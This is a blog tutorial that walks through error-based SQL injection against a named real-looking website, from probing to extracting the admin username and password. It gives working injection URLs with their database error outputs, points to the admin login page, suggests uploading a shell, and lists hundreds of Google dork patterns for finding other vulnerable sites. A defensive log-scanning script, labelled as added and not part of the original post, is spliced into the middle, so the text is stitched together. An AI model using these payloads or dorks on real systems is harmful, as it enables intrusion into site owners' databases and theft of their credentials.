BASIC HACK

Tuesday 4 September 2012

HOW TO HACK ASPX SITES


THIS TUTORIAL IS ONLY FOR EDUCATIONAL PURPOSES AND I AM NOT RESPONSIBLE FOR ANYTHING ILLEGAL YOU DO
I am going to give a tutorial on how to hack an ASPX site.
The procedure is given below.

The URL on which the attack will be done is:

http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=1


1st step:
http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6 ' having 1=1--

It will give the following error:

Column 'tbl_PRODUCT.id' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

This means the site is vulnerable: the injected quote broke out of the query, and the raw database error (which already names a table and a column) was returned to the browser.

Step 2:
To find the version, use the following URL:
http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6 'and 1=convert(int,@@version)--

Output:
Server Error in '/' Application.
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.5000.00 (Intel X86)
Dec 10 2010 10:56:29
Copyright (c) 1988-2005 Microsoft Corporation
Enterprise Edition on Windows NT 6.1 (Build 7601: Service Pack 1)
' to data type int.

Here "Microsoft SQL Server 2005 - 9.00.5000.00 (Intel X86) Dec 10 2010 10:56:29" is the version.

To find the database name, use this:
http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6 'and 1=convert(int,db_name())--

Output:
Conversion failed when converting the nvarchar value 'dbsterlite' to data type int.
dbsterlite is the database name.

Finding the username:
http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6 'and 1=convert(int,user_name())--

Output:
Conversion failed when converting the nvarchar value 'db_hoststerlite' to data type int.
Here the username is db_hoststerlite.


STEP 3:
Finding table names
http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6'and 1=convert(int,(select top 1 table_name from information_schema.tables))--

OUTPUT:
Conversion failed when converting the nvarchar value 'tbl_subcategoryname' to data type int.
Here the 1st table is 'tbl_subcategoryname'.

Then we have to find the 2nd table:

http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6'and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('tbl_subcategoryname')))--

OUTPUT:
Conversion failed when converting the nvarchar value 'tbl_testimonials' to data type int.
tbl_testimonials is the 2nd table.

For the 3rd table:
http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6'and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('tbl_subcategoryname','tbl_testimonials')))--

Continue with this type of command until you no longer get any error.
The tables are:
1=tbl_subcategoryname
2=tbl_testimonials
3=tbl_News
4=tbl_advertisement
5=tbl_career
6=tbl_category
7=tbl_classified
8=tbl_inquiry
9=tbl_adminmaster
10=tbl_futureproducts
11=tbl_gallery
12=tbl_product
13=tbl_productphoto
14=tbl_quatation


Here we want the admin name and password, so the table we need is
tbl_adminmaster

STEP 4:
Finding column names

For the 1st column:
http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6'and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='tbl_adminmaster'))--

OUTPUT:
Conversion failed when converting the nvarchar value 'id' to data type int.
The 1st column is id.

For the 2nd column:
http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6'and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='tbl_adminmaster' and column_name not in('id')))--

OUTPUT:
Conversion failed when converting the nvarchar value 'username' to data type int.
The 2nd column is username.

Then:
http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6'and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='tbl_adminmaster' and column_name not in('id','username')))--

OUTPUT:
Conversion failed when converting the nvarchar value 'password' to data type int.
Continue with this type of command until there is no error.

For example, if we enter the following command:

http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6'and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='tbl_adminmaster' and column_name not in('id','username','password')))--

the page will load correctly without any errors.
This means there are only 3 columns in the table 'tbl_adminmaster'.

STEP 5:
Extracting the information

After getting the required table name and column names, the following commands can be used to extract information:

http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6'and 1=convert(int,(select top 1 username from tbl_adminmaster))--

OUTPUT:
Conversion failed when converting the varchar value 'admin' to data type int.
Here username=admin


http://sterlitelubricants.com/automotive.aspx?state=viewpage&id=6'and 1=convert(int,(select top 1 password from tbl_adminmaster))--

OUTPUT:
Conversion failed when converting the varchar value 'admin' to data type int.
password=admin
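A defender's counterpart to the five steps above, as an added example that is not part of the original post: a small Python scanner that reads IIS W3C Extended log records (constructed here, in the default field layout) and flags requests whose query string carries the error-based injection signatures used in this walkthrough, marking those that drew an HTTP 500 as likely value leaks. The log lines, client addresses and the `SIGNATURES` list are this example's own assumptions.

```python
"""Flag error-based SQL injection probes like the ones above in IIS W3C Extended logs.
Added, constructed example: the log lines are made up; the signatures come from the
requests in the tutorial (HAVING 1=1, convert(int,...), @@version, information_schema)."""
import re
from urllib.parse import unquote_plus

SIGNATURES = (
    r"having\s+1\s*=\s*1",          # step 1: HAVING without GROUP BY leaks a column name
    r"convert\s*\(\s*int\s*,",      # steps 2-5: the conversion error carries the value
    r"@@version",
    r"\b(db_name|user_name)\s*\(",
    r"information_schema\.(tables|columns)",
    r"'\s*(and|or)\s+\d",           # quote breaking out of a numeric id= parameter
    r"--\s*$",                      # comment terminator ending the query string
)
_PATTERNS = [re.compile(s, re.IGNORECASE) for s in SIGNATURES]

# Constructed sample in default IIS W3C layout; 203.0.113.7 replays the tutorial's probes.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2012-09-04 10:00:01 203.0.113.7 GET /automotive.aspx state=viewpage&id=1 200
2012-09-04 10:00:09 203.0.113.7 GET /automotive.aspx state=viewpage&id=6+'+having+1=1-- 500
2012-09-04 10:00:21 203.0.113.7 GET /automotive.aspx state=viewpage&id=6+'and+1=convert(int,@@version)-- 500
2012-09-04 10:00:40 203.0.113.7 GET /automotive.aspx state=viewpage&id=6'and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))-- 500
2012-09-04 10:01:02 198.51.100.2 GET /automotive.aspx state=viewpage&id=7 200
"""

def normalise(query):
    """URL-decode a cs-uri-query value and collapse whitespace so signatures line up."""
    return re.sub(r"\s+", " ", unquote_plus(query)).strip()

def scan_log(text):
    """Parse a W3C log with its #Fields: header; return one finding per suspicious record."""
    fields, findings = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        parts = line.split()
        if not fields or line.startswith("#") or len(parts) != len(fields):
            continue
        rec = dict(zip(fields, parts))
        hits = [p.pattern for p in _PATTERNS if p.search(normalise(rec.get("cs-uri-query", "-")))]
        if not hits:
            continue
        # A 500 on a request carrying a value-leaking token is the tutorial's "Server Error" page.
        leak = rec.get("sc-status") == "500" and any("convert" in h or "having" in h for h in hits)
        findings.append({"client": rec.get("c-ip"), "path": rec.get("cs-uri-stem"),
                         "status": int(rec.get("sc-status", "0")), "signatures": hits, "error_leak": leak})
    return findings
```

Running `scan_log(SAMPLE_LOG)` yields three findings, all from 203.0.113.7 with status 500 and `error_leak` set; the two ordinary `id=1`/`id=7` requests produce nothing.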

Then you can find the admin login page by using
'Havij'.

The admin login page is:
http://sterlitelubricants.com/admin/login.aspx

Then, after logging in as admin, you can upload your own shell and do whatever you want. I will explain how to upload your shell in later tutorials.

You can also find these types of vulnerable sites using Google dorks.
Examples:

inurl:.asp?sid=

Code:
".asp?bookID="
".asp?cart="
".asp?cartID="
".asp?catalogid="
".asp?category_list="
".asp?CategoryID="
".asp?catID="
".asp?cid="
".asp?code_no="
".asp?code="
".asp?designer="
".asp?framecode="
".asp?id="
".asp?idcategory="
".asp?idproduct="
".asp?intCatalogID="
".asp?intProdId="
".asp?item_id="
".asp?item="
".asp?itemID="
".asp?maingroup="
".asp?misc="
".asp?newsid="
".asp?order_id="
".asp?p="
".asp?pid="
".asp?ProdID="
".asp?product_id="
".asp?product="
".asp?productid="
".asp?showtopic="
".asp?Sku="
".asp?storeid="
".asp?style_id="
".asp?StyleID="
".asp?userID="
"about.asp?cartID="
"accinfo.asp?cartId="
"acclogin.asp?cartID="
"add.asp?bookid="
"add_cart.asp?num="
"addcart.asp?"
"addItem.asp"
"add-to-cart.asp?ID="
"addToCart.asp?idProduct="
"addtomylist.asp?ProdId="
"adminEditProductFields.asp?intProdID="
"advSearch_h.asp?idCategory="
"affiliate.asp?ID="
"affiliate-agreement.cfm?storeid="
"affiliates.asp?id="
"ancillary.asp?ID="
"archive.asp?id="
"article.asp?id="
"aspx?PageID"
"basket.asp?id="
"Book.asp?bookID="
"book_list.asp?bookid="
"book_view.asp?bookid="
"BookDetails.asp?ID="
"browse.asp?catid="
"browse_item_details.asp"
"Browse_Item_Details.asp?Store_Id="
"buy.asp?"
"buy.asp?bookid="
"bycategory.asp?id="
"cardinfo.asp?card="
"cart.asp?action="
"cart.asp?cart_id="
"cart.asp?id="
"cart_additem.asp?id="
"cart_validate.asp?id="
"cartadd.asp?id="
"cat.asp?iCat="
"catalog.asp"
"catalog.asp?CatalogID="
"catalog_item.asp?ID="
"catalog_main.asp?catid="
"category.asp"
"category.asp?catid="
"category_list.asp?id="
"categorydisplay.asp?catid="
"checkout.asp?cartid="
"checkout.asp?UserID="
"checkout_confirmed.asp?order_id="
"checkout1.asp?cartid="
"comersus_listCategoriesAndProducts.asp?idCategory="
"comersus_optEmailToFriendForm.asp?idProduct="
"comersus_optReviewReadExec.asp?idProduct="
"comersus_viewItem.asp?idProduct="
"comments_form.asp?ID="
"contact.asp?cartId="
"content.asp?id="
"customerService.asp?TextID1="
"default.asp?catID="
"description.asp?bookid="
"details.asp?BookID="
"details.asp?Press_Release_ID="
"details.asp?Product_ID="
"details.asp?Service_ID="
"display_item.asp?id="
"displayproducts.asp"
"downloadTrial.asp?intProdID="
"emailproduct.asp?itemid="
"emailToFriend.asp?idProduct="
"events.asp?ID="
"faq.asp?cartID="
"faq_list.asp?id="
"faqs.asp?id="
"feedback.asp?title="
"freedownload.asp?bookid="
"fullDisplay.asp?item="
"getbook.asp?bookid="
"GetItems.asp?itemid="
"giftDetail.asp?id="
"help.asp?CartId="
"home.asp?id="
"index.asp?cart="
"index.asp?cartID="
"index.asp?ID="
"info.asp?ID="
"item.asp?eid="
"item.asp?item_id="
"item.asp?itemid="
"item.asp?model="
"item.asp?prodtype="
"item.asp?shopcd="
"item_details.asp?catid="
"item_list.asp?maingroup"
"item_show.asp?code_no="
"itemDesc.asp?CartId="
"itemdetail.asp?item="
"itemdetails.asp?catalogid="
"learnmore.asp?cartID="
"links.asp?catid="
"list.asp?bookid="
"List.asp?CatID="
"listcategoriesandproducts.asp?idCategory="
"modline.asp?id="
"myaccount.asp?catid="
"news.asp?id="
"order.asp?BookID="
"order.asp?id="
"order.asp?item_ID="
"OrderForm.asp?Cart="
"page.asp?PartID="
"payment.asp?CartID="
"pdetail.asp?item_id="
"powersearch.asp?CartId="
"price.asp"
"privacy.asp?cartID="
"prodbycat.asp?intCatalogID="
"prodetails.asp?prodid="
"prodlist.asp?catid="
"product.asp?bookID="
"product.asp?intProdID="
"product_info.asp?item_id="
"productDetails.asp?idProduct="
"productDisplay.asp"
"productinfo.asp?item="
"productlist.asp?ViewType=Category&CategoryID="
"productpage.asp"
"products.asp?ID="
"products.asp?keyword="
"products_category.asp?CategoryID="
"products_detail.asp?CategoryID="
"productsByCategory.asp?intCatalogID="
"prodView.asp?idProduct="
"promo.asp?id="
"promotion.asp?catid="
"pview.asp?Item="
"resellers.asp?idCategory="
"results.asp?cat="
"savecart.asp?CartId="
"search.asp?CartID="
"searchcat.asp?search_id="
"Select_Item.asp?id="
"Services.asp?ID="
"shippinginfo.asp?CartId="
"shop.asp?a="
"shop.asp?action="
"shop.asp?bookid="
"shop.asp?cartID="
"shop_details.asp?prodid="
"shopaddtocart.asp"
"shopaddtocart.asp?catalogid="
"shopbasket.asp?bookid="
"shopbycategory.asp?catid="
"shopcart.asp?title="
"shopcreatorder.asp"
"shopcurrency.asp?cid="
"shopdc.asp?bookid="
"shopdisplaycategories.asp"
"shopdisplayproduct.asp?catalogid="
"shopdisplayproducts.asp"
"shopexd.asp"
"shopexd.asp?catalogid="
"shopping_basket.asp?cartID="
"shopprojectlogin.asp"
"shopquery.asp?catalogid="
"shopremoveitem.asp?cartid="
"shopreviewadd.asp?id="
"shopreviewlist.asp?id="
"ShopSearch.asp?CategoryID="
"shoptellafriend.asp?id="
"shopthanks.asp"
"shopwelcome.asp?title="
"show_item.asp?id="
"show_item_details.asp?item_id="
"showbook.asp?bookid="
"showStore.asp?catID="
"shprodde.asp?SKU="
"specials.asp?id="
"store.asp?id="
"store_bycat.asp?id="
"store_listing.asp?id="
"Store_ViewProducts.asp?Cat="
"store-details.asp?id="
"storefront.asp?id="
"storefronts.asp?title="
"storeitem.asp?item="
"StoreRedirect.asp?ID="
"subcategories.asp?id="
"tek9.asp?"
"template.asp?Action=Item&pid="
"topic.asp?ID="
"tuangou.asp?bookid="
"type.asp?iType="
"updatebasket.asp?bookid="
"updates.asp?ID="
"view.asp?cid="
"view_cart.asp?title="
"view_detail.asp?ID="
"viewcart.asp?CartId="
"viewCart.asp?userID="
"viewCat_h.asp?idCategory="
"viewevent.asp?EventID="
"viewitem.asp?recor="
"viewPrd.asp?idcategory="
"ViewProduct.asp?misc="
"voteList.asp?item_ID="
"whatsnew.asp?idCategory="
"WsAncillary.asp?ID="
"WsPages.asp?ID="
